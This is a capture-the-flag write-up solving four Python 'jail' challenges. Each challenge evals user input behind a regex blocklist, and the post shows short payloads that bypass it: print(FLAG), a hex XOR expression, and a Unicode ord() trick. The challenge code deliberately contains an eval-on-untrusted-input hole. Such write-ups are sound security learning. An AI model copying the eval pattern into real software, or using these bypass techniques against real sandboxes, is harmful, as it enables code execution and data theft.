∵ ollvirt2 ∴ 2021-12-15 ∞ 4'
The Python Jail series consists of 4 challenges that revolve around a set of Python 3 scripts. In each one, the goal is to send a Python expression over netcat that extracts the flag stored on the server. The flag is printed to stdout, and it happens that all stdout from the program is piped back to us.
Let's take a look at the code for Python Jail 1 (the simplest).
import re

# We have a file on our server called answer.py with the flag stored. In order to
# read it, you must type in Python code that evaluates to 1337
from answer import FLAG

# these are all the characters or symbols you can't use - you must write Python code that equals 1337 WITHOUT these
regexes = [
    # no two digits in a row (aka 13 and 37 will be caught)
    r'\d\d',
    # no common math symbols
    r'\+',
    r'-',
    r'\*',
    r'/',
    # we've removed other characters
    r'<',
    r'>',
    r'\^',
    r'v',
    r'&',
    r'\|',
    r'_',
    r'%',
    # blocks all Unicode symbols and 'exec' and 'class' to prevent unwanted RCE
    r'[\U000000ff-\U0010ffff]',
    r'exec',
    r'class'
]

inp = input('>>> ')
if any([re.search(r, inp) for r in regexes]):
    print("Don't do bad stuff")
    exit()

if eval(inp) == 1337:
    print(FLAG)
else:
    print('wrong')
Looks like we can't use a very direct method (sending 1337), but we can call whatever functions we want (outside of exec and the keyword class). So, let's circumvent the conditional completely and send print(FLAG).
print(FLAG)
ctf{...}
wrong
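Very cool! The flag is printed as a side effect of eval. Since print returns None, the comparison with 1337 then fails and the script prints wrong, but by that point we already have what we came for. We can skip Jail 2 because the exact same thing works.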
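To see why both lines show up, here is a minimal local sketch of the Jail 1 check. The FLAG value and the run_jail helper are stand-ins made up for illustration; the real flag lives in answer.py on the server, and the real script prints directly instead of returning a string.

```python
import contextlib
import io
import re

# Placeholder flag for local testing (assumption; the real one is on the server).
FLAG = "ctf{placeholder}"

# Same patterns as the Jail 1 script above.
REGEXES = [
    r'\d\d', r'\+', r'-', r'\*', r'/', r'<', r'>', r'\^', r'v', r'&',
    r'\|', r'_', r'%', r'[\U000000ff-\U0010ffff]', r'exec', r'class',
]


def run_jail(inp):
    """Hypothetical helper: mimic the server's checks and return what it would print."""
    out = io.StringIO()
    with contextlib.redirect_stdout(out):
        if any(re.search(r, inp) for r in REGEXES):
            print("Don't do bad stuff")
        elif eval(inp) == 1337:  # eval runs the payload before the comparison happens
            print(FLAG)
        else:
            print('wrong')
    return out.getvalue()


# print(FLAG) leaks the flag during eval, then fails the comparison.
print(run_jail('print(FLAG)'), end='')
# The direct answer is caught by the two-digits-in-a-row pattern.
print(run_jail('1337'), end='')
```

The first call returns the placeholder flag followed by wrong, matching the session above; the second is rejected by the filter before eval ever runs.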
However, in the code for Jail 3, we have:
regexes = [
    r'\d\d',
    r'\.',
    r'\+',
    r'-',
    r'\*',
    r'/',
    r'>',
    r'v',
    r'"',
    r"'",
    r'\(',
    r'_',
    r'[\U000000ff-\U0010ffff]',
]
Well, with the left parenthesis gone, looks like our function-calling days are over. However, we received a new mathematical operation: ^, which is XOR in Python. We still need a way of writing our operands without consecutive digits. With Python's native 0x prefix for hexadecimal numbers, maybe we can find a suitable hexadecimal expression for 1337. Opening the Python REPL, let's look at 1337 directly.
>>> hex(1337)
'0x539'
Hmm, that will not do: 0x539 still contains consecutive digits (53 and 39), so the \d\d pattern rejects it. But with XOR, maybe we can get something useful. Let's XOR that value with 0xfff on the left-hand side.
>>> hex(0xfff^0x539)
'0xac6'
Perfect! Neither 0xfff nor 0xac6 has two digits in a row, and because XOR is its own inverse, that means we have
>>> 0xfff^0xac6
1337
Send that expression to Jail 3, and we have our flag!
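The mask 0xfff was a lucky first guess. As a rough sketch, the same idea can be turned into a search over every 12-bit mask. The Jail 3 patterns are copied from the listing above; the passes_filter helper and the choice of search range are my own assumptions, not part of the challenge.

```python
import re

# Jail 3 patterns, copied from the listing above.
REGEXES = [
    r'\d\d', r'\.', r'\+', r'-', r'\*', r'/', r'>', r'v', r'"', r"'",
    r'\(', r'_', r'[\U000000ff-\U0010ffff]',
]

TARGET = 1337


def passes_filter(payload):
    """Hypothetical helper: True if no Jail 3 pattern matches the payload."""
    return not any(re.search(r, payload) for r in REGEXES)


# For each mask, mask ^ (mask ^ TARGET) == TARGET, so every pair evaluates to 1337.
# Keep only the pairs whose hex spelling survives the filter.
candidates = []
for mask in range(0x1000):
    payload = f'{hex(mask)}^{hex(mask ^ TARGET)}'
    if passes_filter(payload):
        candidates.append(payload)

print(len(candidates), 'usable payloads')
print('0xfff^0xac6' in candidates)
```

Any entry in candidates would work as a Jail 3 answer; the one used above is simply the easiest to find by hand.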
That leaves us with only Jail 4, which looks like this:
import re
from answer import FLAG

regexes = [
    r'\d\d',
    r'\+',
    r'-',
    r'\*',
    r'/',
]

inp = input('>>> ')
if any([re.search(r, inp) for r in regexes]) or (len(inp) > 8):
    print("Don't do bad stuff")
    exit()

if eval(inp) == 1337:
    print(FLAG)
else:
    print('wrong')
At first glance, this doesn't look all that menacing, until you notice the length restriction: the input can be at most 8 characters. That rules out our past solutions as they stand, since print(FLAG) and 0xfff^0xac6 are both 11 characters long. However, Unicode characters are no longer filtered out in this jail, and parentheses and quotes are allowed again. That leaves a surprisingly simple solution. In the Python REPL, we can find the character whose code point is 1337.
>>> chr(1337)
'Թ'
>>> ord('Թ')
1337
And it so happens that ord('Թ') is precisely 8 characters. Sending this to the server for Python Jail 4 nets us our last flag of the series. I've heard that the intended solution to Jail 4 is 1_3_3_7, which is only 7 characters. This works because Python (3.6 and later) allows underscores between digits in numeric literals for readability and ignores them when evaluating the number, so no two digits ever sit next to each other. Hence, we've successfully solved the Python Jails the wrong way.
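Both answers can be checked locally before sending them. This is a small sketch with the Jail 4 patterns and length limit copied from the listing above; the accepted helper is a hypothetical name of mine, and it skips the flag printing entirely.

```python
import re

# Jail 4 patterns and length limit, copied from the listing above.
REGEXES = [r'\d\d', r'\+', r'-', r'\*', r'/']
MAX_LEN = 8


def accepted(payload):
    """Hypothetical helper: True if the payload passes Jail 4 and evaluates to 1337."""
    if any(re.search(r, payload) for r in REGEXES) or len(payload) > MAX_LEN:
        return False
    return eval(payload) == 1337


# Show each payload, its length, and whether Jail 4 would hand over the flag.
for payload in ("ord('Թ')", '1_3_3_7', '0xfff^0xac6', '1337'):
    print(repr(payload), len(payload), accepted(payload))
```

The first two payloads are accepted, the Jail 3 answer fails on length, and the plain 1337 fails on the two-digits-in-a-row pattern.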
Bypassing filters is a common challenge when writing exploits. Many RCE or SQL injection payloads rely on some method of encoding to avoid being filtered out by WAFs and the like. Thus, by learning how to bypass filters, we can better develop effective exploits as a red team or patch discovered vulnerabilities as a blue team.
Thanks for reading!